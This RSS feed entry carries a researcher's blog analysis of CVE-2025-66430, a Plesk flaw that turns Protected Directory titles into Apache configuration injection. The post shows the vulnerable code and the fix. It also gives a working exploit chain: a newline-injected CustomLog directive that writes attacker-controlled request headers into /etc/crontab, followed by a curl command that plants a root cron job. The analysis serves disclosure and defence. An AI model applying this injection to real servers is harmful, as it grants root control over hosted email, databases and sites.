CVE | bubu https://albertofdr.github.io/category/cve/ CVE Wowchemy (https://wowchemy.com)en-usThu, 25 Jun 2026 00:00:00 -0400 https://albertofdr.github.io/media/icon_hu6d3904a8a268bf465abae078477fa7c8_47999_512x512_fill_lanczos_center_3.png CVE https://albertofdr.github.io/category/cve/ CVE-2025-6630 Analysis https://albertofdr.github.io/post/cve-2025-66430/ Thu, 25 Jun 2026 00:00:00 -0400 https://albertofdr.github.io/post/cve-2025-66430/ <p>CVE-2025-66430, released on December 12, 2025 and discovered by <a href="https://www.linkedin.com/in/sysmus3p" target="_blank" rel="noopener">Philip Okhonko</a>, was assigned a CVSS score of 9.1. This vulnerability allows Plesk users with access to <code>Protected Directories</code> to perform remote code execution (RCE) on the server, potentially granting full control over the system, including emails, databases, and other sensitive data.</p> <p>In this article, I provide an in-depth analysis of the vulnerability, covering the affected versions, the underlying source code responsible, deployed mitigations, potential impact, and a detailed proof-of-concept demonstration.</p> <h2 id="plesk-software">Plesk Software</h2> <p>Plesk is a web hosting control panel that provides a graphical interface and automation tools to manage websites, servers, and hosting accounts. It allows administrators and users to handle tasks such as domain management, email configuration, security settings, database management, and application deployment without requiring deep command-line knowledge. Plesk is widely used by hosting providers and businesses to simplify server and website administration across Linux and Windows environments.</p> <h2 id="affected-versions">Affected Versions</h2> <p>All product versions earlier than <code>18.0.74</code> were affected by this vulnerability. For versions <code>18.0.70</code> through <code>18.0.72</code>, a corrective patch was issued; however, it required manual application. Consequently, instances running these versions may remain vulnerable if the patch was not explicitly applied. In subsequent releases, specifically versions <code>18.0.73</code> and <code>18.0.74</code>, the fix was incorporated into the automatic update process. These versions included the remediation by default, removing the need for manual intervention. As a result, exposure may vary across deployments depending on the version in use and whether the manual patch was applied in environments running <code>18.0.70</code>–<code>18.0.72</code>.</p> <h1 id="vulnerability-details">Vulnerability Details</h1> <h2 id="source-code-analysis">Source code analysis</h2> <p>The vulnerability originates from a function within the file <code>ProtectedDirectories.php</code>. The function in question is as follows:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="sd">/** </span></span></span><span class="line"><span class="cl"><span class="sd"> * Get protected directory description </span></span></span><span class="line"><span class="cl"><span class="sd"> * </span></span></span><span class="line"><span class="cl"><span class="sd"> * @param ProtDir_Apache $pdir </span></span></span><span class="line"><span class="cl"><span class="sd"> * @param string $directory </span></span></span><span class="line"><span class="cl"><span class="sd"> * @param string $prefix </span></span></span><span class="line"><span class="cl"><span class="sd"> * @return array </span></span></span><span class="line"><span class="cl"><span class="sd"> */</span> </span></span><span class="line"><span class="cl"><span class="k">private</span> <span class="k">function</span> <span class="nf">_getDirectoryDescription</span><span class="p">(</span><span class="nx">ProtDir_Apache</span> <span class="nv">$pdir</span><span class="p">,</span> <span class="nv">$directory</span><span class="p">,</span> <span class="nv">$prefix</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="k">array</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;directory&#39;</span> <span class="o">=&gt;</span> <span class="nx">rtrim</span><span class="p">(</span><span class="nv">$directory</span><span class="p">,</span> <span class="s2">&#34;/&#34;</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;realm&#39;</span> <span class="o">=&gt;</span> <span class="nv">$pdir</span><span class="o">-&gt;</span><span class="na">getRealm</span><span class="p">(),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;authFile&#39;</span> <span class="o">=&gt;</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">_getAuthFile</span><span class="p">(</span><span class="nx">rtrim</span><span class="p">(</span><span class="nv">$prefix</span><span class="p">,</span> <span class="s2">&#34;/&#34;</span><span class="p">)),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;relativePath&#39;</span> <span class="o">=&gt;</span> <span class="nv">$pdir</span><span class="o">-&gt;</span><span class="na">getPath</span><span class="p">(),</span> </span></span><span class="line"><span class="cl"> <span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><h2 id="exploit-analysis">Exploit Analysis</h2> <p>Creating a Protected Directory affects the Apache <code>httpd.conf</code> configuration for that domain. This modification is performed by the <code>root</code> user. Therefore, when a Protected Directory is created, the resulting Apache configuration might look like the example below. Note that the <code>AuthName</code> field reflects the value specified in the directory title.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-apacheconf" data-lang="apacheconf"><span class="line"><span class="cl"><span class="nt">&lt;Directory</span> <span class="s">&#34;/var/www/vhosts/test.local/httpdocs/pwned&#34;</span><span class="nt">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nb">AuthType</span> Basic </span></span><span class="line"><span class="cl"> <span class="nb">AuthName</span> <span class="s2">&#34;pwned&#34;</span> </span></span><span class="line"><span class="cl"> <span class="nb">AuthUserFile</span> <span class="s2">&#34;/var/www/vhosts/system/test.local/pd/d..httpdocs@pwned&#34;</span> </span></span><span class="line"><span class="cl"> <span class="nb">require</span> valid-user </span></span><span class="line"><span class="cl"><span class="nt">&lt;/Directory&gt;</span> </span></span></code></pre></div><p>As anticipated, if no sanitization is applied to the value written into the configuration file, this results in a configuration injection performed with <code>root</code> privileges. As observed in the source code, prior to the patch there was no proper sanitization of the user-controlled input written into the configuration. By injecting a newline character, it becomes possible to append arbitrary Apache configuration directives, thereby exploiting the vulnerability.</p> <p>At this stage, several exploitation paths can be considered. One possible approach is to create a <code>rce.php</code> file and access it to trigger arbitrary command execution. However, this method has a limitation: Plesk creates a dedicated low-privilege system user for each domain. As a result, any executed commands would run under that domain user rather than as root.To achieve remote code execution as <code>root</code>, a more effective approach involves abusing the <code>CustomLog</code> directive to write into the system <code>crontab</code>. By injecting a malicious <code>CustomLog</code> entry, it becomes possible to register arbitrary commands that will later be executed by <code>cron</code> with <code>root</code> privileges. An example of such an injection is shown below:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-diff" data-lang="diff"><span class="line"><span class="cl"> &lt;Directory &#34;/var/www/vhosts/test.local/httpdocs/pwned&#34;&gt; </span></span><span class="line"><span class="cl"> AuthType Basic </span></span><span class="line"><span class="cl"><span class="gi">+ AuthName &#34;&#39;# </span></span></span><span class="line"><span class="cl"><span class="gi">+ &lt;/Directory&gt; </span></span></span><span class="line"><span class="cl"><span class="gi">+ CustomLog &#39;/etc/crontab&#39; &#39;%{X-Command}i&#39; </span></span></span><span class="line"><span class="cl"><span class="gi">+ &lt;Directory /var/www/vhosts/test.local/httpdocs/private&gt; </span></span></span><span class="line"><span class="cl"><span class="gi">+ AuthName FAKE </span></span></span><span class="line"><span class="cl"><span class="gi">+ # &#34; </span></span></span><span class="line"><span class="cl"><span class="gi"></span> AuthUserFile &#34;/var/www/vhosts/system/test.local/pd/d..httpdocs@pwned&#34; </span></span><span class="line"><span class="cl"> require valid-user </span></span><span class="line"><span class="cl"> &lt;/Directory&gt; </span></span></code></pre></div><p>In this injection, a controlled HTTP header value is used as the content that will ultimately be written into the crontab. After modifying the Apache configuration through the injected directives, a final step is required: sending a crafted HTTP request containing the actual payload that will be included on <code>/etc/crontab</code> file.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">curl -H <span class="s2">&#34;X-Command: * * * * * echo CVE-2025-66430 &gt;&gt; /tmp/pwned&#34;</span> <span class="s2">&#34;http://server/&#34;</span> </span></span></code></pre></div><h2 id="impact">Impact</h2> <p>Remote Code Execution (RCE). Any Plesk user with access to the Password-Protected Directories feature could gain root-level access on the server. This vulnerability allows an attacker to gain access to all information on the server. Since Plesk provides a centralized platform for deploying multiple services, including email and databases, the potential impact of such a compromise can be severe.</p> <h2 id="mitigation">Mitigation</h2> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-diff" data-lang="diff"><span class="line"><span class="cl">/** </span></span><span class="line"><span class="cl">* Get protected directory description </span></span><span class="line"><span class="cl">* </span></span><span class="line"><span class="cl">* @param ProtDir_Apache $pdir </span></span><span class="line"><span class="cl">* @param string $directory </span></span><span class="line"><span class="cl">* @param string $prefix </span></span><span class="line"><span class="cl">* @return array </span></span><span class="line"><span class="cl">*/ </span></span><span class="line"><span class="cl">private function _getDirectoryDescription(ProtDir_Apache $pdir, $directory, $prefix) </span></span><span class="line"><span class="cl">{ </span></span><span class="line"><span class="cl"> return array( </span></span><span class="line"><span class="cl"> &#39;directory&#39; =&gt; rtrim($directory, &#34;/&#34;), </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="gd">- &#39;realm&#39; =&gt; $pdir-&gt;getRealm(), </span></span></span><span class="line"><span class="cl"><span class="gd"></span><span class="gi">+ &#39;realm&#39; =&gt; rtrim(preg_replace(&#39;/[^ \t\x21-\x7E\x80-\xFF]|[&#34;$]/&#39;, &#39;&#39;, $pdir-&gt;getRealm()), &#39;\\&#39;), </span></span></span><span class="line"><span class="cl"><span class="gi"></span> &#39;authFile&#39; =&gt; $this-&gt;_getAuthFile(rtrim($prefix, &#34;/&#34;)), </span></span><span class="line"><span class="cl"> &#39;relativePath&#39; =&gt; $pdir-&gt;getPath(), </span></span><span class="line"><span class="cl"> ); </span></span><span class="line"><span class="cl">} </span></span></code></pre></div><p>The code snippet shown above is not present in the latest versions. While the changes are minor, the current version not only removes the trailing backslash but also strips any backslashes within the Realm. The latest version of the function is shown below:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="sd">/** </span></span></span><span class="line"><span class="cl"><span class="sd">* Get protected directory description </span></span></span><span class="line"><span class="cl"><span class="sd">* </span></span></span><span class="line"><span class="cl"><span class="sd">* @param ProtDir_Apache $pdir </span></span></span><span class="line"><span class="cl"><span class="sd">* @param string $directory </span></span></span><span class="line"><span class="cl"><span class="sd">* @param string $prefix </span></span></span><span class="line"><span class="cl"><span class="sd">* @return array </span></span></span><span class="line"><span class="cl"><span class="sd">*/</span> </span></span><span class="line"><span class="cl"><span class="k">private</span> <span class="k">function</span> <span class="nf">_getDirectoryDescription</span><span class="p">(</span><span class="nx">ProtDir_Apache</span> <span class="nv">$pdir</span><span class="p">,</span> <span class="nv">$directory</span><span class="p">,</span> <span class="nv">$prefix</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="k">array</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;directory&#39;</span> <span class="o">=&gt;</span> <span class="nx">rtrim</span><span class="p">(</span><span class="nv">$directory</span><span class="p">,</span> <span class="s2">&#34;/&#34;</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;realm&#39;</span> <span class="o">=&gt;</span> <span class="nx">preg_replace</span><span class="p">(</span><span class="nx">ProtDir_Abstract</span><span class="o">::</span><span class="na">REALM_FORBIDDEN_SYMBOLS</span><span class="p">,</span> <span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="nv">$pdir</span><span class="o">-&gt;</span><span class="na">getRealm</span><span class="p">()),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;authFile&#39;</span> <span class="o">=&gt;</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">_getAuthFile</span><span class="p">(</span><span class="nx">rtrim</span><span class="p">(</span><span class="nv">$prefix</span><span class="p">,</span> <span class="s2">&#34;/&#34;</span><span class="p">)),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;relativePath&#39;</span> <span class="o">=&gt;</span> <span class="nv">$pdir</span><span class="o">-&gt;</span><span class="na">getPath</span><span class="p">(),</span> </span></span><span class="line"><span class="cl"> <span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">// Defined in ProtDirAbstract.php </span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="k">public</span> <span class="k">const</span> <span class="no">REALM_FORBIDDEN_SYMBOLS</span> <span class="o">=</span> <span class="s1">&#39;/[^ \t\x21-\x7E\x80-\xFF]|[&#34;$\\\\]/&#39;</span><span class="p">;</span> </span></span></code></pre></div><h1 id="proof-of-concept">Proof-of-Concept</h1> <p>A proof-of-concept video demonstrating the exploit in a local environment is available below.</p> <video controls> <source src="images/final.mp4" type="video/mp4"> Your browser does not support the video tag. </video> <p>Hope you enjoyed it :)</p> <p><strong>Thanks for reading!</strong></p> <h1 id="other-author-writeups">Other Author Writeups</h1> <ul> <li>ASIS CTF Finals 2025 Author&rsquo;s writeup: <a href="https://albertofdr.github.io/post/asisctf-finals-2025/" target="_blank" rel="noopener">link</a>.</li> <li>CrewCTF 2025 Author&rsquo;s writeup: <a href="https://albertofdr.github.io/post/crewctf-2025/" target="_blank" rel="noopener">link</a>.</li> </ul> <h1 id="more-to-read">More to Read</h1> <ul> <li>Browser Permissions Blog: <a href="https://albertofdr.github.io/web-security-class/browser/browser.permissions" target="_blank" rel="noopener">link</a>.</li> <li>Permission Hijacking at Scale: <a href="https://albertofdr.github.io/post/permission-hijacking-2025/" target="_blank" rel="noopener">link</a></li> <li>Web-to-App Communication: <a href="https://albertofdr.github.io/web-security-class/browser/web.to.app" target="_blank" rel="noopener">link</a>.</li> </ul>